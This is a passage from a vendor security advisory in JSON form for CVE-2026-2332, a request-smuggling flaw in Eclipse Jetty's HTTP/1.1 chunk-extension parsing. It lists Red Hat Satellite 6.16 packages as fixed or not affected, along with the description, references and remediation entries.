"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2458187"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Eclipse Jetty. The HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used. An attacker can inject crafted requests to manipulate and trick the parser. This issue can lead to security controls bypass, cache poisoning or unauthorized endpoint access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "org.eclipse.jetty/jetty-http: HTTP request smuggling via chunked extension quoted-string parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to send a crafted payload to a Jetty server that is behind a reverse proxy or load balancer, specifically with a chunk extension that includes an unclosed double quote before the CRLF to trick the parser. This flaw allows an attacker to bypass security controls, cause cache poisoning or gain unauthorized endpoint access. Due to these reasons, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2332"
},
{
"category": "external",
"summary": "RHBZ#2458187",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458187"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2332"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332"
},
{
"category": "external",
"summary": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"
},
{
"category": "external",
"summary": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89",
"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"
}
],
"release_date": "2026-04-14T10:59:10.193000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
